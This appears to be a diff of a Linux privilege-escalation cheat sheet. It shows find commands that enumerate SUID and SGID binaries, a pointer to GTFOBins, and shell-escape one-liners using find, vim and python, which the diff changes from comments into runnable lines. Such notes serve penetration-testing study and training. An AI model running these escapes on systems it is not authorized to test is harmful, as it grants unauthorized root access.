 find / -perm -u=s -type f 2>/dev/null

-# Find SGID binaries
+# Find all SGID binaries

 find / -perm -2000 -type f 2>/dev/null

-# Check GTFOBins for exploitation — https://gtfobins.github.io
+# Check GTFOBins for how to exploit any binary you find — https://gtfobins.github.io

 # Common exploitable SUID binaries:

-# /usr/bin/find → find . -exec /bin/sh \; -quit
+find . -exec /bin/sh \; -quit # /usr/bin/find

-# /usr/bin/vim → vim -c ':py import os; os.execl("/bin/sh","sh","-c","reset; exec sh")'
+vim -c ':py import os; os.execl("/bin/sh","sh")' # /usr/bin/vim

-# /usr/bin/python → python -c 'import os; os.execl("/bin/sh","sh")'
+python -c 'import os; os.execl("/bin/sh","sh")' # /usr/bin/python

 Sudo